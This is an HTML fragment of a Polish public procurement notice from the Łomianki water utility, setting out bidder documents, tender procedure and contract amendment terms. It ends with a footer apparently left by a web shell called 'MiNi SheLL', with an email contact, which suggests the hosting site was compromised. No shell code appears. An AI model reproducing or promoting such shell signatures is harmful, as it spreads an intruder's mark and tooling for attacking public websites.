<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony Formularz Ofertowy zawierający wszelkie informacje zawarte we wzorze stanowiącym załącznik nr 1 do SIWZ; 2. Kosztorys ofertowy sporządzony przez Wykonawcę na podstawie projektu budowlano - wykonawczego w pierwszej kolejności i dopiero jako uzupełnienie na podstawie przedmiaru robót. 3. Pełnomocnictwo udzielane osobom podpisującym ofertę, o ile prawo do reprezentowania Wykonawcy w powyższym zakresie nie wynika wprost z dokumentu rejestrowego; 4.  Oświadczenia i dokumenty, o których mowa w pkt. 6.1., w pkt. 6.2. i w pkt. 6.4. (ewentualnie w pkt. 6.3. lub w pkt. 6.5. lub w pkt. 6.5.) SIWZ. 5. Dowód wpłacenia obowiązkowego wadium</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wzór umowy jest integralną częścią specyfikacji i nie podlega negocjacjom, poza szczególnymi przypadkami, gdzie Zamawiający dopuszcza możliwość dokonania  następujących zmian w umowie i określa ich warunki:wprowadzenie do przedmiotu umowy (zamówienia) i do dokumentacji projektowej zmian, o których mowa w art. 36a ust. 5 ustawy z dnia 7 lipca 1994 r, Prawo budowlane (Dz. U. z 2006 r, nr 156 poz. 1118 z późn. zm). Zmiana będzie możliwa w przypadku jej akceptacji przez projektanta oraz Zamawiającego i będzie wynikała ze zmian ustaw lub rozporządzeń regulujących realizację przedmiotu zamówienia lub będzie niezbędna ze względu na konieczność prawidłowego wykonania przedmiotu zamówienia zgodnie z przyszłym sposobem użytkowania. Jeżeli w wyniku wprowadzonych zmian do przedmiotu umowy i do dokumentacji projektowej wynikną roboty zamienne/zaniechane niezbędne do wykonania, możliwa będzie zmiana należnego Wykonawcy wynagrodzenia w formie aneksu w odniesieniu do robót zamiennych/zaniechanych.
Ewentualna zmiana wynagrodzenia wynikająca z powyższych zmian w przedmiocie umowy ustalona zostanie zgodnie z zasadami określonymi ppkt. 16.7. SIWZ.
zmiana terminu wykonania przedmiotu umowy możliwa będzie w przypadku konieczności wstrzymania wykonywania całości lub części robót realizowanych dla Zamawiającego w odniesieniu do poszczególnych Zadań, na skutek okoliczności niezależnych od Wykonawcy, w szczególności takich, jak: niekorzystne warunki atmosferyczne, uniemożliwiające prowadzenie robót; przyczyny techniczne tj. kolizje z niezinwentaryzowanym uzbrojeniem podziemnym lub innymi obiektami,
przyczyny losowe (np. huragan, powódź lub inne kataklizmy), ujawnienie się w trakcie wykonywania przedmiotu zamówienia wad w dokumentacji projektowej,
konieczność wprowadzenia do przedmiotu zamówienia i do dokumentacji zmian zgodnie z ppkt. 16.6.1. SIWZ. Podstawą dokonania powyższych zmian będzie potwierdzenie w dokumentacji budowy, przez inspektora nadzoru Zamawiającego w odniesieniu do poszczególnych Zadań lub projektanta sprawującego nadzór autorski: wystąpienia w/w okoliczności uzasadniających wstrzymanie robót, okresu wstrzymania robót wpływającego na zmianę terminu i sporządzenie protokółu konieczności - zatwierdzonego przez Zamawiającego w odniesieniu do poszczególnych Zadań, a nadto stosowne podpisane aneksy do umowy. 
Zmiana należnego Wykonawcy wynagrodzenia w odniesieniu do robót zamiennych - 
w przypadku, o którym mowa w ppkt. 16.6.1. SIWZ - ustalona zostanie według następujących zasad: za podstawę kalkulacji przyjęte zostaną ceny jednostkowe z kosztorysu ofertowego, a ilości robót na podstawie przedmiaru, jeżeli roboty nie występowały w kosztorysie ofertowym, a są niezbędne do rozliczenia robót zamiennych podstawą kalkulacji w odniesieniu do materiałów i sprzętu będą dane wyjściowe do kosztorysowania z kosztorysu ofertowego (załącznika nr 3 do umowy), a nakłady robocizny i nakłady rzeczowe z odpowiednich katalogów.
Zamawiający zastrzega sobie prawo wypowiedzenia umowy na podstawie art. 145 ust. 1 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (t. j. Dz. U. z 2010r., Nr 113, poz. 759 z póź. zm.).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zwik.lomianki.pl zakładka przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Wodociągów i Kanalizacji w Łomiankach Sp. z o.o. ul. Rolnicza 244 ,05-092 Łomianki.KOMPLET DOKUMENTACJI W WERSJI PAPIEROWEJ - KOSZT 200 zł.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.11.2011 godzina 11:00, miejsce: Zakład Wodociągów i Kanalizacji w Łomiankach Sp. z o.o. ul. Rolnicza 244 ,05-092 Łomianki, BIURO OBSŁUGI KLIENTA.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com